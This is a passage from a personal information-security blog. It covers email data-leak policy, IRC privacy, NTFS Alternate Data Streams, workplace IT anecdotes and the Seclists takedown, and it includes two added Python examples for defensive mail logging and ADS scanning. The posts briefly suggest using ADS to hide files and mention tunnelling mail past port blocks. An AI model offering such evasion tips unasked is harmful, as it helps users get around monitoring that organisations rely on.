1) Evaluate why your users would want to send email to their home-based email accounts, particularly webmail. Most users are not malicious and are only trying to get work done in the easiest way they know how. Maybe they want to work from home. In that case, provide web-based access or, better yet, a full-featured way to connect to their work account from home without all the additional hoops of a VPN and such. People using Exchange have little excuse to not be using OWA and a nicely-featured web front end. Ask why the users are doing these things, and then provide them such easy and logical solutions so they don't try to circumvent the process.

2) Obviously, log outgoing mail. If someone does keep trying to email out sensitive information, logs are necessary to track it. There should be one or two levels of logging. First, log all mail headers incoming and outgoing so that you can track activity. Second, such as in the article's hospital example, filter and log data in mail that is leaving the network, for instance medical records and other personal information. Obviously the second level of logging is more intensive, and shouldn't be bothered with unless the company has particular need.

3) Retain the ability to monitor employee email usage down to even reading their email. While this ability shouldn't be exercised all that often (how many employees are happy about others reading their email, honestly? and how many unhappy employees are the productive employees?), the policy should keep this option open in the event of suspicion about a truly malicious user. Authorization should be limited to HR, a direct manager or two, or approved technical staff, with no party acting alone. This is easier in some organizations and more difficult in others that have different work/life balance expectations in employees. The more an organization is sympathetic to the converging role of technology at work in personal life (kinda like personal phone calls to the doctor), the less hands-on the policy should be. Some companies will actually need to have staff regularly reading actual emails for regulatory compliance, and that's fine, too, when needed.

4) Block outgoing 25 and incoming 110 (and other common ports, like Gmail's ports) to only authorized servers. This won't stop people from web-based email or completely non-standard setups (I can tunnel it on any port I want, really), but at least a huge swath of people will be prevented from storing and sending email from their workstation mail client. Besides saving storage space and resources, no one needs to accidentally send out an email to a client from their PajamaMonkey69 email account at Yahoo. Also keep tight control on mail relay settings for those approved mail servers. Attempts should be logged and investigated, especially when originating internally.

5) Software policy should drastically limit user email clients to one (maybe two) approved email client applications. Make things as standard as possible. Manage that app properly.

6) Education. Education is not a panacea, but at least educate and teach employees how to use the tools given to them, and why circumventing them can put the company, themselves, and their clients at risk needlessly. This also should help draw out difficulties they may have with the tools and maybe expose why they circumvent policies in the first place.
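
The two logging levels in step 2, as an added example (not code from the original post or from any product named in it): a review pass over the messages an authorized relay has already handed off. Level one keeps the envelope of every message (sender, recipients, originating host, subject); level two, which the post rightly reserves for companies that need it, looks inside the body for record-like identifiers and separately flags mail leaving for a personal webmail domain. The messages, the webmail domain list, the X-Originating-IP header, the SSN pattern and the "MRN" medical-record-number pattern are all assumptions made for the example.

```python
"""Outbound-mail review: header log for everything, content flags where needed.
Added example, not from the original post. Sample messages, domain list and
the identifier patterns below are constructed for the example."""
import email
import re
from email.utils import getaddresses

INTERNAL_DOMAIN = "example-hospital.test"                      # assumed
WEBMAIL_DOMAINS = {"gmail.com", "yahoo.com", "hotmail.com", "hushmail.com"}
SSN_RE = re.compile(r"\b\d{3}-\d{2}-\d{4}\b")                 # US SSN shape
MRN_RE = re.compile(r"\bMRN[:#]?\s*\d{6,}\b", re.IGNORECASE)  # assumed record-number shape

# Constructed sample traffic, in the order the relay saw it.
SAMPLE_MESSAGES = [
    """From: alice@example-hospital.test
To: bob@partner-lab.test
Subject: meeting Thursday
X-Originating-IP: [10.1.2.3]

See you at 2pm.
""",
    """From: carol@example-hospital.test
To: carol.personal@gmail.com
Cc: desk@example-hospital.test
Subject: Fwd: chart for tonight
X-Originating-IP: [10.1.2.44]

Patient MRN: 00123456, follow-up needed.
""",
    """From: dave@example-hospital.test
To: claims@partner-insurer.test
Subject: claim 8812
X-Originating-IP: [10.1.3.7]

Member SSN 123-45-6789 attached for verification.
""",
]


def envelope(msg):
    """Level one: what gets logged for every message, headers only."""
    senders = [addr for _, addr in getaddresses(msg.get_all("From", []))]
    rcpts = [addr for _, addr in getaddresses(msg.get_all("To", []) + msg.get_all("Cc", []))]
    return {
        "from": senders[0].lower() if senders else "",
        "to": [r.lower() for r in rcpts],
        "orig_ip": msg.get("X-Originating-IP", "").strip("[]"),
        "subject": msg.get("Subject", ""),
    }


def external_webmail_recipients(env):
    """Recipients whose domain is on the personal-webmail list."""
    return [r for r in env["to"] if r.rpartition("@")[2] in WEBMAIL_DOMAINS]


def body_text(msg):
    """Collect text/plain parts; walk() yields the message itself if it is not multipart."""
    chunks = []
    for part in msg.walk():
        if part.get_content_type() == "text/plain":
            payload = part.get_payload(decode=True) or b""
            chunks.append(payload.decode(part.get_content_charset() or "utf-8", "replace"))
    return "\n".join(chunks)


def sensitive_hits(msg):
    """Level two: count identifier-shaped strings in the body."""
    text = body_text(msg)
    return {"ssn": len(SSN_RE.findall(text)), "mrn": len(MRN_RE.findall(text))}


def review(raw_messages):
    """Return (header_log, flagged). Every message lands in header_log;
    only webmail leakage or identifier hits put it in flagged."""
    header_log, flagged = [], []
    for raw in raw_messages:
        msg = email.message_from_string(raw)
        env = envelope(msg)
        header_log.append(env)
        webmail = external_webmail_recipients(env)
        hits = sensitive_hits(msg)
        if webmail or any(hits.values()):
            flagged.append({"from": env["from"], "subject": env["subject"],
                            "webmail": webmail, "hits": hits})
    return header_log, flagged


if __name__ == "__main__":
    log, flags = review(SAMPLE_MESSAGES)
    print("logged %d messages" % len(log))
    for f in flags:
        print("FLAG", f)
```

Run against the sample, the meeting note is logged and nothing more, the forwarded chart is flagged twice over (personal Gmail recipient and a record number in the body), and the claim mail to a legitimate partner is flagged on content alone, which is the case step 2 says only a company with a particular need should bother to catch.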
.: irc.freenode.net
"A military body goes through myriad transformations, in which everything is blended. Nothing is not orthodox, nothing is not unorthodox." -The Art of War, Chapter 2: On Waging Battle

It has been years since I've been on IRC regularly. I think I first got on IRC back in 1995ish when I moved from AOL over to a real ISP and thus needed to find a new place to chat. While I didn't really chat about anything technical, I stayed a near-regular in IRC until after college when around 2002 I kinda drifted away. I mostly stuck to gaming chats and once my gaming took a lull so too did my IRC days.

However, more and more I see security/technical groups with a presence on IRC, particularly freenode.net. As such, I started my next mini-project last night to get my ass back on IRC regularly. My one requirement for doing so, though, is that I want to be able to hide my host name (IP) or otherwise mask/reroute it. I don't really have any external servers available to proxy or bounce off of, but I think freenode itself will let me cloak my host name, which might be enough. Of note, I read up on bouncers and might put one up on my server just to see what that is all about.

Fun times, and it'll be nice to get back on IRC for some shoulder-rubbing. I also need to get my ass on a forum somewhere as well, but that is predicated on getting at least one of my systems up on a proxy somewhere (something I should do anyway). Yes, I like my privacy and I dislike making a target of myself...and no, I don't antagonize people or anything. I just prefer obfuscation for as long as it holds out.

If I get on freenode, I'll be authed as LonerVamp, of course.
.: security, encryption, passwords, obfuscation, oh my!
Whitedust pointed me to Emergent Chaos with an announcement that obscurity will save us and we can just hide our files someplace unexpected and be safe! Well, ok, mordaxus was nearly as sarcastic as I was in that last line.

I just have two points in mentioning this. First, I wouldn't argue against someone who says that encryption itself is simply a form of obscurity. It is obscured because a key/passphrase is not known. But know that bit of information, and encryption is done. Of course, this means every password system is also a form of obscurity...but I still wouldn't argue with that person to any great length.

Second, there are plenty of places to hide files in Windows machines already. Alternate Data Streams in NTFS have never gotten the attention they deserve, especially since few tools poke around in there, and those that do are sloooow. I would bet that few people even know about ADS and fewer will ever bother to do a scan for those files. Of course, I'm not saying this is protection for passwords and financial information. I would more use ADS for hiding porn stashes...
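
A scan for those streams, as an added example (not code from the original post): NTFS reports every stream on a file as ":<name>:$<type>", with the ordinary file contents being the unnamed "::$DATA" stream, so anything with a non-empty name and type $DATA is an alternate stream. The enumeration goes through the Win32 FindFirstStreamW/FindNextStreamW calls via ctypes and therefore only does anything on Windows with an NTFS volume (on Windows, "dir /R" and PowerShell's "Get-Item -Stream *" show the same thing for a single path); the name parsing is plain Python. The "stash" stream name and the scratch file in the demo are made up.

```python
"""Walk a directory tree and list NTFS alternate data streams.
Added example, not from the original post. Enumeration is Windows-only;
parse_stream_name / is_alternate_stream work anywhere."""
import ctypes
import os
import sys

_MAX_PATH = 260
INVALID_HANDLE_VALUE = ctypes.c_void_p(-1).value


class WIN32_FIND_STREAM_DATA(ctypes.Structure):
    """Layout documented for FindFirstStreamW: size, then the stream name."""
    _fields_ = [("StreamSize", ctypes.c_int64),
                ("cStreamName", ctypes.c_wchar * (_MAX_PATH + 36))]


def parse_stream_name(raw):
    """':stash:$DATA' -> ('stash', '$DATA'); the default stream is '::$DATA'."""
    parts = raw.split(":")
    if len(parts) != 3 or parts[0] != "":
        raise ValueError("unexpected stream name %r" % raw)
    return parts[1], parts[2]


def is_alternate_stream(raw):
    """True for a named $DATA stream; False for the default stream and for
    non-data streams such as directory index streams."""
    name, stype = parse_stream_name(raw)
    return name != "" and stype == "$DATA"


def list_streams(path):
    """Return [(raw_stream_name, size_in_bytes)] for one file (Windows/NTFS)."""
    if sys.platform != "win32":
        raise OSError("stream enumeration needs the Win32 API")
    k32 = ctypes.WinDLL("kernel32", use_last_error=True)
    k32.FindFirstStreamW.argtypes = [ctypes.c_wchar_p, ctypes.c_int,
                                     ctypes.POINTER(WIN32_FIND_STREAM_DATA), ctypes.c_uint32]
    k32.FindFirstStreamW.restype = ctypes.c_void_p
    k32.FindNextStreamW.argtypes = [ctypes.c_void_p, ctypes.POINTER(WIN32_FIND_STREAM_DATA)]
    k32.FindNextStreamW.restype = ctypes.c_int
    k32.FindClose.argtypes = [ctypes.c_void_p]
    data = WIN32_FIND_STREAM_DATA()
    handle = k32.FindFirstStreamW(path, 0, ctypes.byref(data), 0)  # 0 = FindStreamInfoStandard
    if handle is None or handle == INVALID_HANDLE_VALUE:
        return []   # no enumerable streams (or access denied); nothing to report
    streams = []
    try:
        while True:
            streams.append((data.cStreamName, data.StreamSize))
            if not k32.FindNextStreamW(handle, ctypes.byref(data)):
                break
    finally:
        k32.FindClose(handle)
    return streams


def scan_for_ads(root):
    """(path, stream_name, size) for every alternate data stream under root."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            for raw, size in list_streams(path):
                if is_alternate_stream(raw):
                    hits.append((path, parse_stream_name(raw)[0], size))
    return hits


if __name__ == "__main__":
    if sys.platform != "win32":
        sys.exit("run this on Windows against an NTFS path")
    target = sys.argv[1] if len(sys.argv) > 1 else "."
    # plant a stream on a scratch file so the scan has something to find
    demo = os.path.join(target, "ads_demo.txt")
    with open(demo, "w") as f:
        f.write("visible\n")
    with open(demo + ":stash", "w") as f:     # "file:stream" opens the ADS
        f.write("hidden payload\n")
    for path, stream, size in scan_for_ads(target):
        print("%s  ->  %s (%d bytes)" % (path, stream, size))
```

Note that the scan only sees what the file system API reports; it does not look inside the streams, so a scheduled run that reports new named streams is closer to what is practical than trying to judge their contents.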

.: on subtlety and the three t's
These are not meant to be related, I just wanted to save them.

"Great wisdom is not obvious, great merit is not advertised. When you see the subtle, it is easy to win -- what has it to do with bravery or cleverness?" - The Art of War, Chapter 4: Formation

and

"IT must balance three T's: time, talent and technology. Today, the tendency is to throw technology at a problem and in so doing, reduce the need for talent (expertise) and reduce time. I recall my colleague Chris Blask saying, 'Computers are fast and people are smart.' Invest first in talent. Give them time to plan and choose technology that will allow them to be smart, *fast*, and you'll have spent your own time wisely." From a blog entry by Dave Piscitello.

.: an alternative admin mmc launcher
This was an interesting enough tool to spend an hour working on. SearchWinComputing has a quick run-through on some code (batch file) that will launch various Windows domain and exchange MMC consoles as another user. Basically you run the file, type 2, supply your domain admin password, and then the AD Users and Computers MMC should launch in domain admin context. Not bad. Although this is one click, one keystroke, and one window longer than my current method (right-click a shortcut), I certainly would need 8 such shortcuts to do what this batch file does in one. I like simplicity, so 1 > 8 in this case.

However, there is some errata in the instructions. I also had to scrounge choice.exe from a site called dynawell (Google for choice.exe), and I snagged sleep.exe from the Windows Server 2003 Resource Kit, although sleep is really not all that necessary if you just take that part of the code out. Hell, it's been a long time since I delved into batch files, so maybe choice can be replaced with CASE for all I know.

Remove all the comments which are scattered in the code, typified by mixed case text. Change the paths to include the backslash such as c:\. Change the options to read :ONE instead of Option One:. Change the runas user to your domain admin or necessary admin to manage these tools. Correct the typo on option 3 "SItes."

Now, I am not one to use fancy or even simple tools that are not usually always available. I've worked on enough systems and in enough ways to know that it sucks to become really accustomed to doing something one way (such as with shortcuts), and then be like a fish out of water when in a situation where I don't have my nifty customized tools. Similar to how I rarely customize or "prettify" Windows anymore. I don't need to spend 4 more hours after a reinstall making it pretty. So little tools like this are typically only minorly used by me. I like being able to sit down at nearly any Windows machine and knowing what I have available and what I would need to do to get what I want (resource kits, third party tools like procmon, etc). Either way, I think this little script can be useful for now.
.: irc.freenode.net
Just FYI, I am currently bouncing around IRC on irc.freenode.net as LonerVamp. I may not be hanging out much of anywhere lately until I figure out how to manage my presence there, but I am around and looking for some home channels to hang out in. I am also looking to run an IRC bouncer/proxy on my server which can keep my presence online and I can then just attach using whatever system I happen to be on at the time. I'm not sure how happy that will be, but I'll be trying it. It has certainly been a long time since I was an IRC addict (about 6 years since I was a perpetual presence), but it is comforting to be back.

I tried JBouncer which is a java-based IRC bouncer, but I don't like the user info it appends to my user when someone does a whois on me. I found the place in the code that sets those variables, but I have been unable to re-compile the java (I've never coded nor compiled java before). I hope to try out Night-Light before the weekend.
.: airpcap
Has anyone seen or used or heard about AirPcap? At $198, it is just a little bit above my "eh, spend the extra money and see how it is" range. I saw a blurb about this in the latest Hakin9 magazine.
.: we've all heard these spoken aloud before...
This was too awesome to pass up putting here. By way of Mike Rothman comes a post of 16 dirty little sayings overheard in IT. I'll add my own commentary to them. What makes this an awesome list? I have heard most of them spoken, multiple times.

1. "It’s only a temporary server. It’s not for production use." This is the bane of sysadmins. This request should always be met with, "what is your hard end date, then?" Too often this uttering is just a way for someone to get something done without properly justifying or defending it and I really hate it. Too often "temporary" turns into "permanent" or even "production" without warning or planning. The only thing worse is when they use their own workstation or some other box without ANY warning. "What do you mean you used your test QA machine to host a new critical ticket system?!" Without admins being complete hard-asses, this would happen constantly.

2. "We’ve tested the backups. They read back just fine. Never restored for real though." I hate this one too, because if there is one thing I think is most important in IT, it is backups. What is worse, though, is *not* hearing this spoken but having it as the unspoken truth. Too many admins never test restores until a restore request. Always test, always verify. I learned this back in science labs in high school.

3. "Patching? yeah. That’s on our list. We’ve been looking at SUS for a while now, just haven’t got round to it." Another classic task procrastinated in our field. Funny how the fundamentals fall into that basket so often...

4. "Of course staff know about the security policy. They have to sign a form at induction. I did when I started 5 years ago." ...along with the other 55 pages of new employee information that grazed us like a gnat and we brushed it away to figure out where the nearest bathroom is and how to log into our system.

5. "We have documented procedures. Everybody just ignores them. Except me, of course." I say this a lot, both at my previous job and my current one, but I admit I sometimes go by memory as well, especially for things I know inside and out and I know the steps have not changed. Again, though, for such a detail-oriented career, IT people too often ignore documented procedures.

6. "Our apps developers do their own thing really. I think they have procedures for promoting code, but I’ve never seen them." This is common too, especially if newer admins were not involved in creating the infrastructure that the developers use to promote code. This isn't necessarily such a bad thing as long as the admins can support it (per their job) and there is some audit trail available so they can answer who screwed up production when it happens. Security should at least know how they do this, though, so that this risk is minimized.

7. "Users have been told a hundred times not to share passwords." Yeah, the only cure for this is a clue bat. The best mitigation besides that is simply constantly changing passwords and stringing someone up when something really bad happens with a hijacked account due to sharing. Or perhaps legal/HR when told, "Well, they share the account, so you can't fire one as we can't PROVE she did it, it could have been either of them."

8. "Security Policy. Hang on. We do have one somewhere… Dave! Have you seen that policy file anywhere?" Haha, yup! My last company did this every time an audit was at the doorstep. And despite me writing some up, they rarely got signed off up the chain of command and even less were enforced. In fact, they never were...

9. "We’re developers. The sys admins make our job so difficult. We have deadlines you know!" This one sucks, but as much as it pains me to see it, there is that very difficult task of making sure developers and admins are reminded that we're all on the same team trying to get to the same clouds in the sky. But both sides do also need to admit that they don't know the full picture. Too many developers have no idea about networking or systems, and many admins have no idea about proper coding and the efforts involved. Security is one thing, but preventing the business folks from getting jobs done is another thing. At the end of the day, if security is holding the business back, the business could lose revenues enough that security is shown the door.

10. "The auditors needed Internet access. WiFi was the answer." Wow, almost word-for-word I've heard this a few times. Also "guests" and "clients" could be put in there. My last job put up an open wireless to do this. Thankfully I've not experienced firsthand someone putting up wireless without asking (the last job asked), but I have heard those stories from people in companies far more critical and important than mine. Yikes! Are CFOs really that stupid? Yes. And he also thinks he's too important for parking spaces and so parks in the fire lane.

11. "Compliance? That’s an HR thing, right?" The age-old "who enforces the company policies?" question. HR or security/IT?

12. "A security breach? Don’t think we’ve ever had one. In any case, we’d just call Dave." In my last job, that would have been me, hehe. This statement just makes me cringe on a number of levels...

13. "The Managing Director wanted it." I think I've heard this more than any other utterance here. Someone in authority pulled their weight and said, "just do it," regardless of how moronic and terrible the task was. I think this right here is where 80% of our stress comes from.

14. "We had a penetration test last year. We passed with flying colours." Wow, I love this one! Who the hell actually passes pen tests with flying colors? If so, you had a vulnerability assessment, not a pen test. And the assessors sucked. No one truly passes a pen test. Every environment has issues, and if they are not technological ones, they are logical and procedural ones. Given a week on site, I really believe no pen tester should walk away stumped and with nothing to do (assuming full physical access). I've seen stumped external attacks against a really solid firewall before, but full assessments should realistically never come back like this.

15. "Yeah, so it’s SQL injection. But our developers tell us there’s nothing of value in the database anyway." I've heard similar things as well, where developers either don't think about the data or feign ignorance.

16. "Marketing are the worst offenders. We don’t support FTP so they rented a cheap web server and uploaded data to that instead." Ahh, human ingenuity. Where there is a will, someone will figure out how to do it, even if it is hokey and terrible and insecure and costly and ...so on. This is why security needs to be an enabler, and management needs to be behind security so circumvention doesn't just happen.

.: adaptive movement
"The comprehensiveness of adaptive movement is limitless." -The Art of War, Chapter 5: Strategic Advance

This reminds me of recent comments from Bejtlich about IDS/IPS devices that are alert-based but have little additional knowledge for the analyst. That is not very adaptive, and as such, ends up affording little value below the surface. Being able to be adaptive in IT and especially security is an amazing ability, as opposed to having very complex, rigid, or incomplete implementations that don't afford much in terms of quick reaction, seamless changes, and ability to get the data you need. It also makes me think of on-demand sniffing needs. Can a security analyst quickly span ports into a pre-configured system set to sniff traffic, or will the analyst have to jump through hours of hoops to get this set up for an emergency?
.: hardware hoarding
One thing I have learned in networking, security, and really IT in general is that you take any opportunity given to pick up some decent hardware. While I sometimes pick up really crappy hardware, there are always times when you get something decent for very little. And nothing is more frustrating than being inspired to do some tinkering only to find no spare boxes that I want to risk messing around on.

So tonight I picked up a motherboard and CPU for $40. The motherboard is an ECS K8T890-A which has dual DDR400 RAM and a Socket 939 which is for AMD 64-bit processors. This ECS may not necessarily be a gaming rig foundation, however it should suit my purposes just fine, as I have a gaming rig already (although the specs are getting really dated). This mobo has an older BIOS which does not really allow overclocking (quite ok, I don't overclock). The AGP slot is also not really a true AGP slot and instead is a modded PCI bus connection. This means pretty much only older video cards are supported (3.3V), and I'd never get the full power of an AGP card anyway. Good info here for my own future reference. The board does support SATA and RAID.

The processor is an AMD 64 3500+. This translates into a 2.2GHz CPU. The CPU is already mounted with heatsink attached, and I've not had a chance to boot it up yet. I don't think I have a proper PSU to support this board right now, but will be collecting some parts over this winter and spring.

This mobo/CPU may make a great foundation for another always-on server that runs Linux as a vmware host and contains a few VM images of my choosing. The board still has great specs for a non-gaming machine. I just need to load it up with RAM and disk space. Unfortunately, the max RAM will be 2GB, which should only run me roughly $200-$250. And I should be able to pull 350GB+ with two disks for under $200. Another $100 for a 500W PSU. And then look into whether I can use this all in a current old chassis or buy up a new one with fans for roughly another $100 and a non-exciting graphics card (or just use on-board) for $60.

Overall, that's still not really all that bad. About $800 for a good solid box that I can utilize in multiple ways. I could even go a bit cheaper in my parts and do Kingston memory instead of Corsair and still be just fine.
.: i run an incompatible browser
I know Microsoft and other sites will take pains to force people to use IE, but I didn't think I'd find a site that would tell me their site was incompatible with IE and I should use Firefox (even though it lets me click forward and get in anyway, which makes me wonder what's so incompatible). AWStats, a web stats app typically for Apache and Linux, tells me such. Talk about annoying both ways.
.: security catalyst forum
Michael Santarcangelo has soft-launched the Security Catalyst Community forum site. This is something we do need, and I'm enthusiastic to see where this community goes. While I think this might be an excellent initiative, there are some concerns I'll just post here because they're really not important enough to bring up to Michael S or those forums.

First, growing a community is not easy unless you happen to have something that draws people in on its own. That's rare, really. I've done community-building work back in gaming where I ran gaming leagues and competitions and basically worked hard to keep the community participating and just plain caring. It is not easy work and is not something you can just say, "I'll build it and they will come." Many forums and sites have sprouted with that mantra and within 6 months the only posts you see are spam posts and what might otherwise be seen as the dust and tumbleweeds of the Internet. It takes constant work by dedicated persons, constant content, and lots of posting and giving people a reason to show up. What makes this even harder? My communities were gamers with lots of leisure time. This community may be made up of a lot of very busy professional people. Hopefully this community will recruit some good people to lead the discussions and provide a reason for everyone else to slowly filter in and continue to contribute.

Second, I'm undecided about the somewhat informal policy of registering with one's real name, or at least putting full name in the signature. I'm not sure the goal of this other than to look more professional. I don't think we need a stuffy community, but rather one that is willing to talk openly. As information security professionals, I think we, of anyone, should be empathetic to our decisions to control or at least mitigate information leakage. Yes, I know McNealy will say my privacy is already gone, deal with it, and I agree with him. But that doesn't mean I have to let go of every device by which I maintain at least a little control. One of those is forums and comments on other sites. The only site that I really like to tie my name, online handle, and/or contact information is either through my own pages or someone deliberately tracking me down. I will lose this battle someday, but until the world starts getting better equipped to deal with it, I'll still put up a fight. :) We can't let today's inability to deal with information and identity and the internet get in the way of our professional and (oftentimes needed!) informal communication. The people who want their names posted typically are the people who are branded by their names. They have an interest in making sure their name is out there (typically analysts and experts). Also, if my name is associated with the company I work for, I can't typically talk about certain things without people putting 2 and 2 together and knowing my company has an issue with security concept X. That sort of secrecy is one of my biggest issues and it makes it hard for any of us to properly learn from others' mistakes. That's really one of the biggest reasons I enjoy things like Infragard (NDAs) and other local informal groups of buds. There are many very smart people out there with very valuable ideas that may not want to be associated with their given name when online.

Kinda like McNealy saying my privacy war is already lost, so too is the war on anonymity online. Not only can you not always completely stay anonymous online, but (oddly enough), you can stay pretty damned anonymous online. I don't think a forum community is going to be truly able to maintain the informal policy of non-anonymity. I could pick some random name and bounce through proxies to join in with a free email address and change my grammar/writing style. We shouldn't need to do that here. Likewise, it should be enough that the moderators have the ability to check IP and logs and deal with any miscreants in due fashion.

Besides, come on, there's plenty of Michaels running around here! Hell, at my last job we had 3 Michaels on the same team of 4 people (the odd one out had Michael as his middle name). Other than deliberate impersonators, I've yet to see another LonerVamp. :)

Nonetheless, I look forward to participating as LonerVamp in this new community and seeing where this goes. There's a lot of vury smurt people whom I regularly read already signed up!
.: as the spam turns
One neat thing about running one's own email server is that I get to see all the spam that comes in. After a number of years up, my most-used email addresses are getting about 100 spam messages a day on busy days. Spam used to (as in 2 months ago) come in with names in the subject line. Typically I'm just, yeah right, unless it says Michael or the name of someone I might expect email from. Then I realize just how easy it is for less knowledgeable users to open spam. Typically I see mostly pharmaceutical picture ads, stock scams, and bootleg software.

The spam moved into Chinese characters (wtf?) and in the past week or two I've seen a lot of spam sporting current news headlines in the subject line. Not bad, impressive!

My mail server's spam filters don't catch everything, although it tends to catch about 50% and label them as SPAM for my mail filters. I really don't expect much when I'm using non-SpamAssassin tools that don't cost anything.
.: social engineer
RSnake posted about social engineering. For as much work as I do with networking and computers, I still maintain that the highest success rate attacks on a target are physical and social engineering attacks. The only thing stopping most people from doing more of those things is social mores and the stigma of getting caught and not being able to maintain the anonymity like we have on the Internet.
.: biggest problem in security
Andy posted what is maybe the biggest question (and toughest) we should consistently ask ourselves in this field: What is the biggest problem facing security professionals today? Andy answered user awareness.

I'm not so sure I could so quickly answer just one thing as our biggest problem. If I were to tell a VP where to best spend his money, I think I would answer either technology to protect the users and data, or spend money on educating management, not all users. Managers need to lead, and unless managers are aware of the problems, users aren't really going to give much more of a shit. Companies are economic entities, and users are entities that answer to their managers. Pressure can be applied by educating stakeholders such that they hold management accountable for security. But we all know that devolves into checklists, grades, certifications, and basically the representation (right or made up) of security...which may or may not be the real state of security.

An example of technology mitigating the user problem is in laptop encryption. Users can continue to be stupid and lose laptops because they leave them in plain sight in their cars and put data they shouldn't on them, but if they are encrypted (technology), that user mistake is dramatically mitigated. Of course, this may perpetuate the cycle of relying on technology and ignoring user education...but that's at least where I'd perhaps put my money first. Teach people to ignore spam and phishing and detect it and report it, or implement spam filtering good enough to minimize their exposure to those decisions, along with HIPS/detection to stop those fewer instances where they do slip through? Relying on users would keep me up at night, personally.

Complexity of our environments and technology advancements are also a huge problem right now. Environments keep growing outward and more varied. They're also just plain growing. Trying to create an infrastructure today that can be properly and securely grown for the next 10, 5, or even 3 years is highly difficult. Our work environments creep and grow, and we don't typically have the luxury to start over and build the house correctly to today's threats.

For all that rambling above, I don't mean to diss on users as being stupid and a lost cause. I do realize there are benefits to user education and I by no means would prevent user education or speak up against it. User education is truly part of a blended approach to security, and users are just another required layer to be protected and educated, just like in the spam example above. I'm somewhat playing devil's advocate, but I honestly don't know if I would say user education is our biggest challenge. I think it is just far more complicated than that.

Update: After some more thought this evening and some time playing LEGO Star Wars (awesome!), I think one of the biggest problems we face is making sure our peers (and ourselves) give management the best bang for the buck they can get, and give accurate and honest and truthful assessments and advice. Management needs our help to understand the reality of their state of security and how to properly tackle it. They also need us to keep hounding them so they don't become complacent or think the task is done. So yes, in a way, education is necessary, just not necessarily user-centric as much as tackling the user base from the top. This might include heavy training for IT folks as well; those of us who are laying the blocks and doing the securing and growing and actual work. Even if management is on board, they can only spin their wheels if their people are not getting it.
.: top ten security admin errors
Fred Avolio posted this excellent list of security admin errors last year. It has been languishing in my bookmarks and I thought I'd post it here for posterity. Some of these are excellent issues, although some are not necessarily the security admin's fault.
.: 20 things the average person doesn't know about windows xp
Here is a list of 20 things most people don't know about Windows XP. Honestly, I didn't know a lot of these either! A lot of them won't mean as much to me right now since I don't do much desktop support, but XP is gonna be around for a lot longer. (Do some soul-searching on whether your company really has a reason to move to Vista? Seriously, do you? Other than MS dropping support someday, I doubt it.)
.: stupid email disclaimers
I honestly think email disclaimers are stupid. This is an entertaining list of some bad and worse email disclaimers. Honestly, we all know better than this anyway, and props to any company that just dispenses with this nonsense. I already know that Boeing (a large company that must be security-conscious) does not enforce email disclaimers. If they don't, no one really needs to. Such wasted space and so unnecessary.
.: 101 dumbest moments in business in 2006
This is the best laugh I've had in weeks: CNN's 101 dumbest moments in business in 2006. The Chevy Tahoe viral act gaffe sets the stage, especially once I went to www.youtube.com and looked up some of those Chevy Tahoe ads. It just gets better as well! I didn't realize so many funny and awesome things happened in 2006! And yes, there are IT and security-related incidents listed.
.: familiar territory
"Someone unfamiliar with the mountains and forests, gorges and defiles, the shape of marshes and wetlands cannot advance the army. One who does not employ local guides cannot gain advantages of terrain." -The Art of War, Chapter 7: Armed Contest

Amen to that.

I read Shark Tales off and on, and saw this one today. While amusing, it also comes with a pang of sadness at how often no one ever knows what IT does to keep the ball rolling. IT (all of it, including security) is too often seen as a utility. No one cares until it isn't working. I mean, when was the last time you called up your electricity/internet provider and thanked them for providing the utility that day?
.: wardriving experience
Can't believe I originally missed an article on wardriving! And not a bad one either, considering the ComputerWorld source. The first page is interesting with the setting up of a rather cheap van office. I kinda like that idea, especially considering my car has zero room as it is. I was also enthused about someday getting together some cheap mobile rig (if I got more into wardriving/wireless assessments that is) after watching an episode where the packetsniffers mounted a laptop in their truck. While a front-seat-mounted laptop is borderline illegal (something about a tv or computer screen being visible to the driver), the idea of a mobile wardriving pad is pretty cool. Shag... At any rate, I like a good article with some good technical tips and hardware suggestions. Unlike many ____World articles, it really sounds like this author is definitely speaking from experience. I might have to hunt this guy down when I make it out to Seattle soon.
.: godaddy, myspace, seclists, and the blog masses
I'm sure everyone is going to be posting and abuzz about how MySpace got GoDaddy to drop Seclists.org. But what really makes me frustrated and angry is how often people make assumptions and how ignorant so many people can be (and apparently illiterate). Reading the comments here and here is just an exercise in working up a large frustration level with people who think Fyodor was the one who phished those accounts and then posted them on the site for everyone to grab. And so on. That frustration is what prompted this post, not the news item itself.

Big kudos to Fyodor for digging quickly to the heart of the matter in saying MySpace should have taken action to protect its users whose accounts were compromised, not trying to patch up an unpatchable leak.

Personally, despite my knowledge that security sucks still and botnets and phishing are out of control, I am not convinced that ISPs and registrars should be the police of the Internet. There is still a lot of vigilantism out there with non-official sources tracking down and raising cain about phishing sites and botnets and spambots and illegal or copyrighted material, which can end up with a lot of collateral damage as legitimate persons and innocent victims are infringed upon, especially with amateur cowboys on their missions. I will say, however, that some of that is necessary and legitimate. F-Secure notifying an ISP or registrar about a known phishing site that is doing nothing but phishing is one thing, but non-experts doing it? I'm not sold on that idea.

Shame on MySpace for even pursuing this without at least a little bit of thought or investigation. They could have contacted Fyodor themselves, they could have checked into the mailing list, they could have asked around or browsed the archives themselves to see what the whole story was. They could have (and should have!) notified their own users about the accounts and forced a password change. Wiping out a site when the accounts are already leaked and public domain does absolutely nothing to the integrity and security of MySpace and its users.

Shame on GoDaddy for their impatient reactions and also their own lack of follow-through and investigation. GoDaddy should have experience and relations with known experts and groups who report phishing sites and other TOS violations. I doubt MySpace would or should be amongst those groups. Due process. As a customer of GoDaddy, I would expect due process and not a knee-jerk reaction based on which way the winds are blowing.

.: some more random words on porn, doing things, and laptop encryption
"If you hide your form, conceal your tracks, and always remain strictly prepared, then you can be invulnerable yourself." The Art of War, Chapter 4: Formation

There's a lot of analysts and journalists who write and talk a lot, but it's just all blah blah blah blah, with little substance or anything that matters. And they tend to talk in circles and argue a lot about much of nothing. Brian Krebs is not such a writer. He's one of those rare journalist gems in the security world who gets it, and has respect. He tells it like it is, and I gotta admit, I've enjoyed his writing, accuracy, and tenacity in sticking to his guns despite the unwashed ignorant commenting masses on his more popular topics. He wades into the whole substitute teacher porn exposure case quite deeply, and rightly, ready to get the facts out as this whole incident is one out of proportion debacle. Sic balls, chopper!

